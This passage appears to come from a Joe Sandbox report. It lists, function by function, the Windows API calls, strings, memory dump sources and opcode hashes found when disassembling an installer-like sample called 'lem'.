                                                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                          • wsprintfW.USER32 ref: 00404457
                                                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s$@rD
                                                                          • API String ID: 3540041739-1813061909
                                                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                          APIs
                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: *?|<>/":
                                                                          • API String ID: 589700163-165019052
                                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                          APIs
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Close$DeleteEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1912718029-0
                                                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                          APIs
                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                          • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                          APIs
                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          Strings
                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                          • API String ID: 1697273262-1764544995
                                                                          • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                          • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00404902
                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID: $@rD
                                                                          • API String ID: 3748168415-881980237
                                                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                          APIs
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                          • API String ID: 2577523808-3778932970
                                                                          • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                          • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcatwsprintf
                                                                          • String ID: %02x%c$...
                                                                          • API String ID: 3065427908-1057055748
                                                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                          APIs
                                                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                          • API String ID: 2266616436-4211696005
                                                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00402100
                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                          • String ID:
                                                                          • API String ID: 1599320355-0
                                                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                          APIs
                                                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                          • String ID: Version
                                                                          • API String ID: 512980652-315105994
                                                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          • API String ID: 2102729457-0
                                                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                          • String ID:
                                                                          • API String ID: 2883127279-0
                                                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                          APIs
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                          • String ID: HideWindow
                                                                          • API String ID: 1249568736-780306582
                                                                          • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                          • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                          APIs
                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                          • String ID: !N~
                                                                          • API String ID: 623250636-529124213
                                                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                          APIs
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                          Strings
                                                                          • Error launching installer, xrefs: 00405C48
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 3712363035-66219284
                                                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                          • API String ID: 3509786178-2769509956
                                                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
